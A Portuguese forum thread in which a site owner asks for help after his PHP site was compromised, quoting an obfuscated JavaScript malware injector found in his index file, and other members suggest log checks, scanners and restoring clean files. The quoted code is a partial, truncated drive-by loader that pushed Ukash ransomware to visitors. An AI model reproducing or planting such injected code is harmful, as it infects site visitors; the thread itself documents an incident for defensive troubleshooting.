← Desenvolvimento

Problema com vírus no meu site

Lida 2500 vezes

Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Boas

Estou aqui com um problema que não sei como resolver.

Ontem de manhã o meu pc bloqueou devido ao vírus ukash. Lá pesquisei pela solução, saquei um anti-malware recomendado e resolvi (aparentemente) o problema.

Da parte da tarde voltou a acontecer, voltei a correr o programa e voltei a conseguir usar o pc.

Hoje voltou a acontecer e notei que sempre que aconteceu eu tinha o meu site aberto (www.ligadosadeptos.com) :shock:

Experimentei abrir o meu site noutro computador e não aconteceu nada de mal.

Fui então aos ficheiros do site e notei que existe este código no ficheiro do index:

Citar
<?
#a6f227#
echo "                                                                                                                                                                                                                        <script type=\"text/javascript\" language=\"javascript\" >                                                                                                                                                                                                                                                                                                                                                              if(021===0x11)v=\"va\"+\"l\";try{faweb++}catch(btawetb){try{fve^v}catch(btawt4){try{window.document.body=v}catch(gdsgsdg){w=window;if(020===0x10)e=w[\"e\".concat(if(1){f=new Array(40,,98,114,105,
(...)
,109,112,31,59,32,38,47,112,119,37,59,12,8,13,9,30,105,101,38,33,99,109,99,116,\"+\"arC\"+((020===0x10)?\"ode\":\"\")]((1*w[j]+j%3));}try{(w+s)()}catch(asga){e(s+\"\");}</script>";

#/a6f227#
?>

Apaguei e consegui abrir o site sem problema. Agora há 1 hora atrás o pc voltou a bloquear devido ao mesmo vírus, lá fui ao ficheiro e lá está o código de novo, sem eu ter feito qualquer modificação ao site.

Neste momento não faço ideia o que fazer. Como descubro o que está a acrescentar este código?

Agradeço a vossa ajuda, porque consigo fazer tudo no pc menos abrir o meu próprio site #-o
Offline

Jose Augusto 
Membro
Mensagens 434 Gostos 0
Feedback +3

Troféus totais: 25
Trófeus: (Ver todos)
Windows User Super Combination Combination Topic Starter Level 5 Level 4 Level 3 Level 2 Level 1 100 Posts

Vê nos logs do Apache.

Pelos visto não és o único... experimenta no Google a6f227+gdsgsdg
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 49
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Como esta construído o teu site? Algum cms? Código proprietário?

http://sitecheck.sucuri.net/results/ligadosadeptos.com
Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Obrigado pelas respostas.

O problema é o seguinte: eu não fiz o site e os meus conhecimentos são muito básicos, por isso não sei onde procurar nem como começar.

asturmas, o site está em php, não sei se era isto que perguntavas.

Se me puderem orientar ou direccionar para tutoriais ou qualquer ajuda online agradeço.
Offline

=IceBurn= 
Membro
Mensagens 897 Gostos 3
Feedback +3

Troféus totais: 32
Trófeus: (Ver todos)
Windows User Level 6 Linux User Mobile User Super Combination Combination Topic Starter Poll Voter Poll Starter Level 5

Como esta construído o teu site? Algum cms? Código proprietário?

http://sitecheck.sucuri.net/results/ligadosadeptos.com

Não me parece ser um CMS, terá sido construído de raíz.



njota, estive a ver e tens malware em praticamente todos os ficheiros de javascript, não é só no index.

É um pouco difícil perceber ao certo de onde é injectado o malware sem ter acesso aos ficheiros, à base de dados e aos logs do servidor, mas pergunto, fizeste alguma alteração no site recentemente?
Offline

asturmas 
Administrador
Mensagens 19734 Gostos 49
Feedback +2

Troféus totais: 39
Trófeus: (Ver todos)
Mobile User Windows User Super Combination Combination Topic Starter 100 Poll Votes 50 Poll Votes 10 Poll Votes Poll Voter Poll Starter

Antes de tudo deves substituir os ficheiros infectados pelos originais de forma a limpares o site (temporariamente) e depois tens de contratar um programador para analisar o site para descobrir e corrigir as vulnerabilidades de segurança.
Offline

custodio 
Membro
Mensagens 421 Gostos 6
Feedback +8

Troféus totais: 27
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Poll Voter Level 5 Level 4 Level 3 Level 2 Level 1 100 Posts

Olá

Acho que também é importante fazer limpeza ao teu computador, o problema pode vir daí. Corre o antivírus e o Malwarebytes' Anti-Malware.
Offline

njota 
Membro
Mensagens 241 Gostos 0
Feedback +2

Troféus totais: 17
Trófeus: (Ver todos)
Super Combination Combination Topic Starter Level 3 Level 2 Level 1 100 Posts 50 Posts 10 Posts First Post

Mais uma vez obrigado pela ajuda ;)

Não fiz nenhuma modificação recente. Entretanto editei os ficheiros java à mão para retirar aqueles códigos e já consigo entrar no site sem que este bloqueie.

Corri o anti-malware e eliminei 2 ficheiros que ele acusou.

Apesar de neste momento estar tudo aparentemente normal, o site que o asturmas indicou continua a assinalar alguns ficheiros como infectados, apesar de o tal código já não estar lá como antes...

Queria acabar de vez com o problema, mais alguma ideia?